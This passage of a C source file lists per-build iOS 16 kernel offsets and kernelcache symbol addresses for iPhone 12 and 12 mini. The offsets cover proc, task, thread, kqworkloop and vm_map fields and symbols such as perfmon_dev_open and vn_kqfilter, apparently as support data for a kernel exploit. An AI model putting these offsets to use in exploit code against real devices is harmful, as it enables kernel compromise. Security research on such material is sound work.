0xfffffff0077fe368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f226a0, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D67", .device_id = "iPhone13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff00784c1b0, .kernelcache__gPhysSize = 0xfffffff00784c1b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784a390, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed00f4, .kernelcache__ptov_table = 0xfffffff0077ff3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff0077fc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f226a0, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E247", .device_id = "iPhone13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a491208, .kernelcache__gPhysBase = 0xfffffff00792bfc0, .kernelcache__gPhysSize = 0xfffffff00792bfc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792a198, .kernelcache__perfmon_devices = 0xfffffff00a4cf520, .kernelcache__perfmon_dev_open = 0xfffffff007ef064c, .kernelcache__ptov_table = 0xfffffff0078df188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ce990, .kernelcache__vm_pages = 0xfffffff0078dbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078de128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ce988, .kernelcache__vn_kqfilter = 0xfffffff007f3f538, }, // iOS 16.4.1 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E252", .device_id = "iPhone13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a491208, .kernelcache__gPhysBase = 0xfffffff00792bfc0, .kernelcache__gPhysSize = 0xfffffff00792bfc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792a198, .kernelcache__perfmon_devices = 0xfffffff00a4cf520, .kernelcache__perfmon_dev_open = 0xfffffff007ef064c, .kernelcache__ptov_table = 0xfffffff0078df188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ce990, .kernelcache__vm_pages = 0xfffffff0078dbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078de128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ce988, .kernelcache__vn_kqfilter = 0xfffffff007f3f538, }, // iOS 16.5 // { .kern_version = "Darwin Kernel Version 22.5.0: Mon Apr 24 21:08:42 PDT 2023; root:xnu-8796.122.4~1/RELEASE_ARM64_T8101", .build_version = "20F66", .device_id = "iPhone13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a49d288, .kernelcache__gPhysBase = 0xfffffff007930100, .kernelcache__gPhysSize = 0xfffffff007930100 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792e2d8, .kernelcache__perfmon_devices = 0xfffffff00a4db520, .kernelcache__perfmon_dev_open = 0xfffffff007ef484c, .kernelcache__ptov_table = 0xfffffff0078e3188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4da990, .kernelcache__vm_pages = 0xfffffff0078dfeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078e2128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4da988, .kernelcache__vn_kqfilter = 0xfffffff007f439d0, }, // iOS 16.6 Beta 1 // { .kern_version = "Darwin Kernel Version 22.6.0: Tue May 9 06:18:36 PDT 2023; root:xnu-8796.140.12.502.1~12/RELEASE_ARM64_T8101", .build_version = "20G5026e", .device_id = "iPhone13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a545ab0, .kernelcache__gPhysBase = 0xfffffff0079442a8, .kernelcache__gPhysSize = 0xfffffff0079442a8 + 0x8, .kernelcache__gVirtBase = 0xfffffff007942460, .kernelcache__perfmon_devices = 0xfffffff00a585550, .kernelcache__perfmon_dev_open = 0xfffffff007f1508c, .kernelcache__ptov_table = 0xfffffff0078f79c8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a584910, .kernelcache__vm_pages = 0xfffffff0078f4108, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078f6968, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a584908, .kernelcache__vn_kqfilter = 0xfffffff007f63be0, }, // End iPhone 12 // // Start iPhone 12 Mini // // iOS 16.2 // { .kern_version = "Darwin Kernel Version 22.2.0: Mon Nov 28 20:10:55 PST 2022; root:xnu-8792.62.2~1/RELEASE_ARM64_T8101", .build_version = "20C65", .device_id = "iPhone13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff0078500c8, .kernelcache__gPhysSize = 0xfffffff0078500c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784e2a8, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed41c4, .kernelcache__ptov_table = 0xfffffff007803378, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff007800090, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802328, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f26780, }, // iOS 16.3 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D47", .device_id = "iPhone13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff00784c1b0, .kernelcache__gPhysSize = 0xfffffff00784c1b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784a390, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed00f4, .kernelcache__ptov_table = 0xfffffff0077ff3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff0077fc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f226a0, }, // iOS 16.3.1 // { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:52 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8101", .build_version = "20D67", .device_id = "iPhone13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3b1190, .kernelcache__gPhysBase = 0xfffffff00784c1b0, .kernelcache__gPhysSize = 0xfffffff00784c1b0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784a390, .kernelcache__perfmon_devices = 0xfffffff00a3ec3b0, .kernelcache__perfmon_dev_open = 0xfffffff007ed00f4, .kernelcache__ptov_table = 0xfffffff0077ff3b8, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3eb800, .kernelcache__vm_pages = 0xfffffff0077fc0d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fe368, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a3eb7f8, .kernelcache__vn_kqfilter = 0xfffffff007f226a0, }, // iOS 16.4 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E247", .device_id = "iPhone13,1", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, 